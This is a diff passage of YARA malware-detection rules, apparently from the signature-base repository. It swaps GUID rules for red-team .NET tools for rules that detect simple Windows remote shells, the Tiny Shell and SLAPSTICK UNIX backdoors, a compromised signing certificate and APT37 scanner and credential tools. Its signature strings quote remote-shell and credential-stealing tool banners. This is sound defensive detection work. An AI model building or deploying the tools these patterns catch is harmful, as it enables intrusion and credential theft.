-		modified = "2025-08-15"
-		reference = "https://github.com/r3nhat/XORedReflectiveDLL"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1546-L1560"
+		description = "Threat hunting rule that detects samples signed with the compromised Trading Technologies certificate after May 2022"
+		author = "Florian Roth"
+		id = "9a05fba9-9466-5b69-9207-27ad01d6eb8b"
+		date = "2023-04-20"
+		modified = "2023-12-05"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L227-L242"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "92df3b5c8d1b531dd4b4d04ba53aa6ae5ebf9d1f6869a0d46cd972b082fa1b9f"
-		score = 75
+		logic_hash = "47941828b3c18ed39eddacbc73e147651a9bd48e1a0f7b9847ff1d4c6fea6afd"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "c0e49392-04e3-4abb-b931-5202e0eb4c73" ascii wide
-		$typelibguid1lo = "30eef7d6-cee8-490b-829f-082041bc3141" ascii wide
+		$s1 = { 00 85 38 A6 C5 01 8F 50 FC }
+		$s2 = "Go Daddy Secure Certificate Authority - G2"
+		$s3 = "Trading Technologies International, Inc"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		pe.timestamp> 1651363200 and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharp_Suite : FILE
+rule SIGNATURE_BASE_Windowsshell_S3 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ab3cf358-a41d-584d-baaf-5e8f7232ca85"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/FuzzySecurity/Sharp-Suite"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1562-L1596"
+		description = "Detects simple Windows shell - file s3.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "064754a7-8639-5dbd-93f3-906662b8e9bc"
+		date = "2016-03-26"
+		modified = "2023-12-05"
+		reference = "https://github.com/odzhan/shells/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_winshells.yar#L10-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cffb4eae9fe3f2034fb03defcd0e0f3f1abaaa2638b137bdfdf67d071e055d42"
+		hash = "344575a58db288c9b5dacc654abc36d38db2e645acff05e894ff51183c61357d"
+		logic_hash = "b9274f909b50247a4f5111a14806faadba7814e26805bef7d61eaaf8be4b46ed"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "19657be4-51ca-4a85-8ab1-f6666008b1f3" ascii wide
-		$typelibguid1lo = "0a382d9a-897f-431a-81c2-a4e08392c587" ascii wide
-		$typelibguid2lo = "467ee2a9-2f01-4a71-9647-2a2d9c31e608" ascii wide
-		$typelibguid3lo = "eacaa2b8-43e5-4888-826d-2f6902e16546" ascii wide
-		$typelibguid4lo = "629f86e6-44fe-4c9c-b043-1c9b64be6d5a" ascii wide
-		$typelibguid5lo = "ecf2ffe4-1744-4745-8693-5790d66bb1b8" ascii wide
-		$typelibguid6lo = "0a621f4c-8082-4c30-b131-ba2c98db0533" ascii wide
-		$typelibguid7lo = "72019dfe-608e-4ab2-a8f1-66c95c425620" ascii wide
-		$typelibguid8lo = "f0d28809-b712-4380-9a59-407b7b2badd5" ascii wide
-		$typelibguid9lo = "956a5a4d-2007-4857-9259-51cd0fb5312a" ascii wide
-		$typelibguid10lo = "a3b7c697-4bb6-455d-9fda-4ab54ae4c8d2" ascii wide
-		$typelibguid11lo = "a5f883ce-1f96-4456-bb35-40229191420c" ascii wide
-		$typelibguid12lo = "28978103-d90d-4618-b22e-222727f40313" ascii wide
-		$typelibguid13lo = "0c70c839-9565-4881-8ea1-408c1ebe38ce" ascii wide
-		$typelibguid14lo = "fa1d9a36-415a-4855-8c01-54b6e9fc6965" ascii wide
-		$typelibguid15lo = "252676f8-8a19-4664-bfb8-5a947e48c32a" ascii wide
-		$typelibguid16lo = "447edefc-b429-42bc-b3bc-63a9af19dbd6" ascii wide
-		$typelibguid17lo = "04d0b3a6-eaab-413d-b9e2-512fa8ebd02f" ascii wide
-		$typelibguid18lo = "5611236e-2557-45b8-be29-5d1f074d199e" ascii wide
-		$typelibguid19lo = "53f622eb-0ca3-4e9b-9dc8-30c832df1c7b" ascii wide
-		$typelibguid20lo = "414187db-5feb-43e5-a383-caa48b5395f1" ascii wide
+		$s1 = "cmd                  - execute cmd.exe" fullword ascii
+		$s2 = "\\\\.\\pipe\\%08X" fullword ascii
+		$s3 = "get <remote> <local> - download file" fullword ascii
+		$s4 = "[ simple remote shell for windows v3" fullword ascii
+		$s5 = "REMOTE: CreateFile(\"%s\")" fullword ascii
+		$s6 = "put <local> <remote> - upload file" fullword ascii
+		$s7 = "term                 - terminate remote client" fullword ascii
+		$s8 = "[ downloading \"%s\" to \"%s\"" fullword ascii
+		$s9 = "-l           Listen for incoming connections" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Rat_Shell : FILE
+rule SIGNATURE_BASE_Windosshell_S1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8f206175-f7e4-5543-8059-24f102fcd4b9"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/stphivos/rat-shell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1598-L1612"
+		description = "Detects simple Windows shell - file s1.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b4e783a2-4a93-5c72-9b09-4692b383ac00"
+		date = "2016-03-26"
+		modified = "2023-12-05"
+		reference = "https://github.com/odzhan/shells/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_winshells.yar#L33-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3d88c891393c914b4b1520bbdb575e78740f21bd361fe4187fdd08aeed708540"
+		hash = "4a397497cfaf91e05a9b9d6fa6e335243cca3f175d5d81296b96c13c624818bd"
+		logic_hash = "29fcddc549c615ca5cdda60272926671bc1446c3c7b51c9a2fd867b6b68858b2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "7a15f8f6-6ce2-4ca4-919d-2056b70cc76a" ascii wide
-		$typelibguid1lo = "1659d65d-93a8-4bae-97d5-66d738fc6f6c" ascii wide
+		$s1 = "[ executing cmd.exe" fullword ascii
+		$s2 = "[ simple remote shell for windows v1" fullword ascii
+		$s3 = "-p <number>  Port number to use (default is 443)" fullword ascii
+		$s4 = "usage: s1 <address> [options]" fullword ascii
+		$s5 = "[ waiting for connections on %s" fullword ascii
+		$s6 = "-l           Listen for incoming connections" fullword ascii
+		$s7 = "[ connection from %s" fullword ascii
+		$s8 = "[ %c%c requires parameter" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Dotnet_Gargoyle : FILE
+rule SIGNATURE_BASE_Windowsshell_S4 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5efd0c83-cb65-5bda-b55e-4a89db5f337c"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/countercept/dotnet-gargoyle"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1614-L1629"
+		description = "Detects simple Windows shell - file s4.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "838771dc-f885-5332-9813-2bc01af8e5fe"
+		date = "2016-03-26"
+		modified = "2023-12-05"
+		reference = "https://github.com/odzhan/shells/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_winshells.yar#L55-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c7ad2c6c775ed6355dd93b06e31e04916277564301b45fe13b69d3e25dcd7bad"
+		hash = "f00a1af494067b275407c449b11dfcf5cb9b59a6fac685ebd3f0eb193337e1d6"
+		logic_hash = "fff280debdd32a736e37a73800f226bf6def5dd107abd1d9237d92904622c9ec"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "76435f79-f8af-4d74-8df5-d598a551b895" ascii wide
-		$typelibguid1lo = "5a3fc840-5432-4925-b5bc-abc536429cb5" ascii wide
-		$typelibguid2lo = "6f0bbb2a-e200-4d76-b8fa-f93c801ac220" ascii wide
+		$s1 = "cmd                  - execute cmd.exe" fullword ascii
+		$s2 = "\\\\.\\pipe\\%08X" fullword ascii
+		$s3 = "get <remote> <local> - download file" fullword ascii
+		$s4 = "[ simple remote shell for windows v4" fullword ascii
+		$s5 = "REMOTE: CreateFile(\"%s\")" fullword ascii
+		$s6 = "[ downloading \"%s\" to \"%s\"" fullword ascii
+		$s7 = "[ uploading \"%s\" to \"%s\"" fullword ascii
+		$s8 = "-l           Listen for incoming connections" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 175KB and 2 of them ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Aresskit : FILE
+rule SIGNATURE_BASE_Windowsshell_Gen : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8265cd84-c8e7-5654-9d3a-774dab52d938"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/BlackVikingPro/aresskit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1631-L1644"
+		description = "Detects simple Windows shell - from files keygen.exe, s1.exe, s2.exe, s3.exe, s4.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6b871e8a-8fe3-5cc6-9f2c-ba2359861ea1"
+		date = "2016-03-26"
+		modified = "2023-12-05"
+		reference = "https://github.com/odzhan/shells/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_winshells.yar#L79-L99"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3f7c2cb5dee0d77f70ea1fe231e498d1a16c11f92a8b930c9a603fa64a54cec0"
+		logic_hash = "753dd12f649bcbfcc2c60a2f3be27df5297a671a0ee1856093eed04113616581"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "a7c3d85eabac01e7a7ec914477ea9f17e3020b3b2f8584a46a98eb6a2a7611c5"
+		hash2 = "4a397497cfaf91e05a9b9d6fa6e335243cca3f175d5d81296b96c13c624818bd"
+		hash3 = "df0693caae2e5914e63e9ee1a14c1e9506f13060faed67db5797c9e61f3907f0"
+		hash4 = "344575a58db288c9b5dacc654abc36d38db2e645acff05e894ff51183c61357d"
+		hash5 = "f00a1af494067b275407c449b11dfcf5cb9b59a6fac685ebd3f0eb193337e1d6"
 
 	strings:
-		$typelibguid0lo = "8dca0e42-f767-411d-9704-ae0ba4a44ae8" ascii wide
+		$s0 = "[ %c%c requires parameter" fullword ascii
+		$s1 = "[ %s : %i" fullword ascii
+		$s2 = "[ %s : %s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 175KB and 2 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_DLL_Injector : FILE
+rule SIGNATURE_BASE_Windowsshell_Gen2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "301e70f4-89ed-539c-b7f3-9fc6ae1393b3"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/tmthrgd/DLL-Injector"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1646-L1660"
+		description = "Detects simple Windows shell - from files s3.exe, s4.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8ed8443d-491b-5cb0-b12b-0d25267ba462"
+		date = "2016-03-26"
+		modified = "2023-12-05"
+		reference = "https://github.com/odzhan/shells/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_winshells.yar#L101-L122"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fe92cb643d8ddbc0d8d09a88e90655965001375d05c799d6c2437e6c94b26c7a"
+		logic_hash = "c5ce27554b2ee25b974b567ef5a9ae877906250073da477f0ab5d71d162ac81a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "344575a58db288c9b5dacc654abc36d38db2e645acff05e894ff51183c61357d"
+		hash2 = "f00a1af494067b275407c449b11dfcf5cb9b59a6fac685ebd3f0eb193337e1d6"
 
 	strings:
-		$typelibguid0lo = "4581a449-7d20-4c59-8da2-7fd830f1fd5e" ascii wide
-		$typelibguid1lo = "05f4b238-25ce-40dc-a890-d5bbb8642ee4" ascii wide
+		$s1 = "cmd                  - execute cmd.exe" fullword ascii
+		$s2 = "get <remote> <local> - download file" fullword ascii
+		$s3 = "REMOTE: CreateFile(\"%s\")" fullword ascii
+		$s4 = "put <local> <remote> - upload file" fullword ascii
+		$s5 = "term                 - terminate remote client" fullword ascii
+		$s6 = "[ uploading \"%s\" to \"%s\"" fullword ascii
+		$s7 = "[ error : received %i bytes" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 175KB and 2 of them ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Trufflesnout : FILE
+rule SIGNATURE_BASE_EXT_HKTL_MAL_Tinyshell_Backdoor : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8135d39e-6a9e-567d-840f-8d8c6338cce1"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/dsnezhkov/TruffleSnout"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1662-L1675"
+		description = "Detects Tiny Shell - an open-source UNIX backdoor"
+		author = "Mandiant"
+		id = "69bce2ec-a9af-5656-9a16-0cddb8b0820e"
+		date = "2022-03-17"
+		modified = "2026-01-30"
+		reference = "https://www.mandiant.com/resources/blog/unc2891-overview"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc2891_tinyshell_slapstick.yar#L1-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "03b340ccf4b314ec5d3c33e83e5a47b55e935a8e55acbd6bd9daba43443d53a1"
-		score = 75
+		logic_hash = "1fe9def11dced638ad38236652877427b61d7138fc8c6ce3fe7f1403c367468f"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1f889871263bd6cdad8f3d4d5fc58b4a32669b944d3ed0860730374bb87d730a"
 
 	strings:
-		$typelibguid0lo = "33842d77-bce3-4ee8-9ee2-9769898bb429" ascii wide
+		$sb1 = { C6 00 48 C6 4? ?? 49 C6 4? ?? 49 C6 4? ?? 4C C6 4? ?? 53 C6 4? ?? 45 C6 4? ?? 54 C6 4? ?? 3D C6 4? ?? 46 C6 4? ?? 00 }
+		$sb2 = { C6 00 54 C6 4? ?? 4D C6 4? ?? 45 C6 4? ?? 3D C6 4? ?? 52 }
+		$ss1 = "fork" ascii fullword wide
+		$ss2 = "socket" ascii fullword wide
+		$ss3 = "bind" ascii fullword wide
+		$ss4 = "listen" ascii fullword wide
+		$ss5 = "accept" ascii fullword wide
+		$ss6 = "alarm" ascii fullword wide
+		$ss7 = "shutdown" ascii fullword wide
+		$ss8 = "creat" ascii fullword wide
+		$ss9 = "write" ascii fullword wide
+		$ss10 = "open" ascii fullword wide
+		$ss11 = "read" ascii fullword wide
+		$ss12 = "execl" ascii fullword wide
+		$ss13 = "gethostbyname" ascii fullword wide
+		$ss14 = "connect" ascii fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint32( 0 ) == 0x464c457f and 1 of ( $sb* ) and 10 of ( $ss* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Anti_Analysis : FILE
+rule SIGNATURE_BASE_EXT_HKTL_MAL_Tinyshell_Backdoor_SPARC : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "bd527841-065e-57e9-b70e-c9d232072f1b"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/NYAN-x-CAT/Anti-Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1677-L1690"
+		description = "Detects Tiny Shell variant for SPARC - an open-source UNIX backdoor"
+		author = "Mandiant"
+		id = "332c0c16-e94c-5f09-9e26-a94601b75453"
+		date = "2022-03-17"
+		modified = "2026-01-30"
+		reference = "https://www.mandiant.com/resources/blog/unc2891-overview"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc2891_tinyshell_slapstick.yar#L30-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1a4141b376afbf36a7a9aa340ea5514b85dd6b0fab003554bae06c0240c98a79"
-		score = 75
+		logic_hash = "cda78e26c2e274d24d1e4656fcd09af2930f43af7fac01a3f410a5692d79a5ae"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "3092c8df-e9e4-4b75-b78e-f81a0058a635" ascii wide
+		$sb_xor_1 = { DA 0A 80 0C 82 18 40 0D C2 2A 00 0B 96 02 E0 01 98 03 20 01 82 1B 20 04 80 A0 00 01 82 60 20 00 98 0B 00 01 C2 4A 00 0B 80 A0 60 00 32 BF FF F5 C2 0A 00 0B 81 C3 E0 08 }
+		$sb_xor_2 = { C6 4A 00 00 80 A0 E0 00 02 40 00 0B C8 0A 00 00 85 38 60 00 C4 09 40 02 84 18 80 04 C4 2A 00 00 82 00 60 01 80 A0 60 04 83 64 60 00 10 6F FF F5 90 02 20 01 81 C3 E0 08 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint32( 0 ) == 0x464C457F and ( uint16( 0x10 ) & 0x0200 == 0x0200 ) and ( uint16( 0x12 ) & 0x0200 == 0x0200 ) and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Backnet : FILE
+rule SIGNATURE_BASE_EXT_APT_UNC2891_SLAPSTICK : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "91824d18-f46b-5b95-b650-4d710d711cf9"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/valsov/BackNet"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1692-L1708"
+		description = "Detects SLAPSTICK malware used by UNC2891"
+		author = "Mandiant"
+		id = "788b259e-02cf-5265-9c13-2b5a4b937c32"
+		date = "2022-03-17"
+		modified = "2026-01-30"
+		reference = "https://www.mandiant.com/resources/blog/unc2891-overview"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc2891_tinyshell_slapstick.yar#L44-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "82ab970de2e27e711c502903cc2ede47da296df3ea346c870698c920a4ece282"
-		score = 75
+		logic_hash = "b046a949dab2f38b8181782cc6ea0782d2e102c0c30bc782de74112a77c23d6e"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "9fdae122-cd1e-467d-a6fa-a98c26e76348" ascii wide
-		$typelibguid1lo = "243c279e-33a6-46a1-beab-2864cc7a499f" ascii wide
-		$typelibguid2lo = "a7301384-7354-47fd-a4c5-65b74e0bbb46" ascii wide
-		$typelibguid3lo = "982dc5b6-1123-428a-83dd-d212490c859f" ascii wide
+		$ss1 = { 25 59 20 25 62 20 25 64 20 25 48 3a 25 4d 3a 25 53 20 20 20 20 00 }
+		$ss2 = { 25 2d 32 33 73 20 25 2d 32 33 73 20 25 2d 32 33 73 00 }
+		$ss3 = { 25 2d 32 33 73 20 25 2d 32 33 73 20 25 2d 32 33 73 20 25 2d 32 33 73 20 25 2d 32 33 73 20 25 73 0a 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint32( 0 ) == 0x464c457f ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Allthethings : FILE
+rule SIGNATURE_BASE_Hvs_APT37_Smb_Scanner : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c35160cb-ad31-5195-a7c6-0af91a58737d"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/johnjohnsp1/AllTheThings"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1710-L1723"
+		description = "Unknown smb login scanner used by APT37"
+		author = "Marc Stroebel"
+		id = "89a5cc32-f151-583d-823d-692de2c2b084"
+		date = "2020-12-15"
+		modified = "2023-12-05"
+		reference = "https://www.hybrid-analysis.com/sample/d16163526242508d6961f061aaffe3ae5321bd64d8ceb6b2788f1570757595fc?environmentId=2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_dec20.yar#L2-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a4a562e4db2477be34fa4ccf2c83afafc7aafead3a9eae434b4bc0a5ea6430f7"
+		logic_hash = "0bea71db7052f1c22c01cfbf710d4ed24651cbbd8b0fd29f09dfd49c4e314028"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "0547ff40-5255-42a2-beb7-2ff0dbf7d3ba" ascii wide
+		$s1 = "Scan.exe StartIP EndIP ThreadCount logfilePath [Username Password Deep]" fullword ascii
+		$s2 = "%s - %s:(Username - %s / Password - %s" fullword ascii
+		$s3 = "Load mpr.dll Error " fullword ascii
+		$s4 = "Load Netapi32.dll Error " fullword ascii
+		$s5 = "%s U/P not Correct! - %d" fullword ascii
+		$s6 = "GetNetWorkInfo Version 1.0" fullword wide
+		$s7 = "Hello World!" fullword wide
+		$s8 = "%s Error: %ld" fullword ascii
+		$s9 = "%s U/P Correct!" fullword ascii
+		$s10 = "%s --------" fullword ascii
+		$s11 = "%s%-30s%I64d" fullword ascii
+		$s12 = "%s%-30s(DIR)" fullword ascii
+		$s13 = "%04d-%02d-%02d %02d:%02d" fullword ascii
+		$s14 = "Share:              Local Path:                   Uses:   Descriptor:" fullword ascii
+		$s15 = "Share:              Type:                   Remark:" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 10 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Addreferencedotredteam : FILE
+rule SIGNATURE_BASE_Hvs_APT37_Cred_Tool : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "59299a72-9b7a-5108-81c2-d8f6d2e99b20"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/ceramicskate0/AddReferenceDotRedTeam"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1725-L1738"
+		description = "Unknown cred tool used by APT37"
+		author = "Markus Poelloth"
+		id = "e830025a-f2ac-55b1-aca3-ded9dba83a67"
+		date = "2020-12-15"
+		modified = "2023-12-05"
+		reference = "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_dec20.yar#L31-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ec7e0c39db13d212ff9aac4ec8d7d9b4274f3a404997f9291dcbfeaf311f31b4"
+		logic_hash = "4fb7247b88f2d252e7c9d5034c209945bc9e17f49de3dcdb5bf50b5afb302987"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "73c79d7e-17d4-46c9-be5a-ecef65b924e4" ascii wide
+		$s1 = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>" fullword ascii
+		$s2 = "Domain Login" fullword ascii
+		$s3 = "IEShims_GetOriginatingThreadContext" fullword ascii
+		$s4 = " Type Descriptor'" fullword ascii
+		$s5 = "User: %s" fullword ascii
+		$s6 = "Pass: %s" fullword ascii
+		$s7 = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
+		$s8 = "E@c:\\u" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 500KB and 7 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Lime_Crypter : FILE
+
+rule SIGNATURE_BASE_Hvs_APT37_RAT_Loader
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "484c7a15-7ab2-57d3-848c-0fddff753d52"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/NYAN-x-CAT/Lime-Crypter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1740-L1753"
+		description = "BLINDINGCAN RAT loader named iconcash.db used by APT37"
+		author = "Marc Stroebel"
